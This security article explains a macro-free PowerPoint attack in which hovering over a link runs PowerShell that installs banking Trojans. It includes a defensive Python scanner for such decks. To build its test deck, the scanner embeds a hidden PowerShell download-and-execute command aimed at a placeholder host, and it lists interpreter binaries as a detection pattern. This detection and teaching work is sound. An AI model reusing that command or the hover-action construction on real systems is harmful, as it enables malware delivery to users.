In general, it’s fairly easy to prevent poisoned Microsoft Office files from doing any damage, because the traditional approach hackers have been using relies on macros. If you disable macros on your system, then even if you download and open the poisoned file, it won’t be able to do any harm.
That’s not the case with this new threat, however, which makes it dangerous.
The hackers have figured out a way to run PowerShell code embedded in a PowerPoint presentation file and install malware without relying on macros at all.
Even worse, you don't have to click anything or enable anything. Once the presentation is open, simply hovering the mouse pointer over a link inside it is enough to trigger the action and start the installation in the background. In practice, the way this works is as follows:
A user hovers over the link, and the mouse-over action attached to it launches the PowerShell code. If your version of Microsoft Office has the Protected View security feature enabled, you'll get a security warning when the action tries to run, and you have the opportunity to close the file without any ill effects. If Protected View is off, you won't get a warning at all, and the poisoned file will install its payload. The same thing happens if Protected View is enabled but you dismiss the warning and allow the action.
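To see what the trick looks like on disk, and how to triage a suspect deck without opening it, here is an added example (it is not code from the original article or from the researchers who reported the attack). A .pptx/.ppsx file is a zip of XML parts; a shape's hover or click action is an `<a:hlinkMouseOver>`/`<a:hlinkClick>` element in `ppt/slides/slideN.xml`, and when its `action` attribute is `ppaction://program` PowerPoint runs the command stored as the `Target` of the relationship that `r:id` points to in `ppt/slides/_rels/slideN.xml.rels`. The sample deck the scanner runs against is constructed in memory for the demo, with a placeholder download URL on a reserved `.invalid` host; the specific command line is an assumption, not a real sample.

```python
"""Offline triage of PowerPoint hover/click actions that launch programs."""
import io
import re
import sys
import zipfile
import xml.etree.ElementTree as ET

NS_A = "http://schemas.openxmlformats.org/drawingml/2006/main"
NS_R = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
NS_P = "http://schemas.openxmlformats.org/presentationml/2006/main"
NS_REL = "http://schemas.openxmlformats.org/package/2006/relationships"

# Command interpreters and living-off-the-land binaries worth flagging as an action target.
SUSPICIOUS_TARGET = re.compile(
    r"\b(powershell|pwsh|cmd|mshta|wscript|cscript|rundll32|regsvr32|certutil)\b", re.I)


def _rels_map(zf, slide_name):
    """Map relationship Id -> Target for one slide part (empty if it has no .rels part)."""
    head, _, tail = slide_name.rpartition("/")
    rels_name = f"{head}/_rels/{tail}.rels"
    if rels_name not in zf.namelist():
        return {}
    root = ET.fromstring(zf.read(rels_name))
    return {rel.get("Id"): rel.get("Target", "")
            for rel in root.iter(f"{{{NS_REL}}}Relationship")}


def scan_pptx(data):
    """Return one finding per hover/click action that runs a program or whose
    resolved target looks like a command interpreter."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not re.fullmatch(r"ppt/slides/slide\d+\.xml", name):
                continue
            rels = _rels_map(zf, name)
            root = ET.fromstring(zf.read(name))
            for tag in ("hlinkMouseOver", "hlinkClick"):
                for el in root.iter(f"{{{NS_A}}}{tag}"):
                    action = el.get("action", "")
                    target = rels.get(el.get(f"{{{NS_R}}}id", ""), "")
                    runs_program = action.startswith("ppaction://program")
                    if runs_program or SUSPICIOUS_TARGET.search(target):
                        findings.append({"part": name, "trigger": tag, "action": action,
                                         "target": target, "runs_program": runs_program})
    return findings


def build_sample_pptx():
    """Construct a minimal deck in memory for the demo (not a real malware sample):
    slide 1 carries a hover action that launches PowerShell, slide 2 a plain web link."""
    slide_tmpl = (
        '<p:sld xmlns:a="{a}" xmlns:r="{r}" xmlns:p="{p}"><p:cSld><p:spTree>'
        '<p:sp><p:nvSpPr><p:cNvPr id="2" name="Loading...">{link}</p:cNvPr>'
        '<p:cNvSpPr/><p:nvPr/></p:nvSpPr></p:sp></p:spTree></p:cSld></p:sld>')
    rels_tmpl = (
        '<Relationships xmlns="{ns}">'
        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/'
        'relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/>'
        '<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/'
        'relationships/hyperlink" Target="{target}" TargetMode="External"/>'
        '</Relationships>')
    # Assumed command line; the host is a reserved .invalid name and never resolves.
    ps_cmd = ("powershell -NoP -NonI -W Hidden -Exec Bypass -c &quot;IEX (New-Object "
              "Net.WebClient).DownloadString('http://example.invalid/s.ps1')&quot;")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("ppt/slides/slide1.xml", slide_tmpl.format(
            a=NS_A, r=NS_R, p=NS_P,
            link='<a:hlinkMouseOver r:id="rId2" action="ppaction://program"/>'))
        zf.writestr("ppt/slides/_rels/slide1.xml.rels", rels_tmpl.format(ns=NS_REL, target=ps_cmd))
        zf.writestr("ppt/slides/slide2.xml", slide_tmpl.format(
            a=NS_A, r=NS_R, p=NS_P, link='<a:hlinkClick r:id="rId2"/>'))
        zf.writestr("ppt/slides/_rels/slide2.xml.rels",
                    rels_tmpl.format(ns=NS_REL, target="https://example.com/"))
    return buf.getvalue()


if __name__ == "__main__":
    # Scan a file given on the command line, or the constructed sample if none is given.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pptx()
    for f in scan_pptx(data):
        print(f"{f['part']}: {f['trigger']} action={f['action']!r} target={f['target']!r}")
```

The scan never executes anything from the deck; it only unzips and parses XML, so it is safe to run on a quarantined attachment. The `ppaction://program` check is the reliable signal, since a benign hyperlink carries no such action; the interpreter regex is a second net for files that reach a command through some other action type.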
So far, the research team has uncovered two pieces of malware being installed via this new methodology: Zusy and Tinba, closely related banking Trojans. Nothing about the technique is specific to them, though; any type of malware could be delivered the same way.
This goes to show that simply disabling macros isn't enough anymore. Keep Protected View enabled, don't wave away its warning, and be very careful when opening PowerPoint attachments, even from people you know. To do less could prove costly in more ways than one!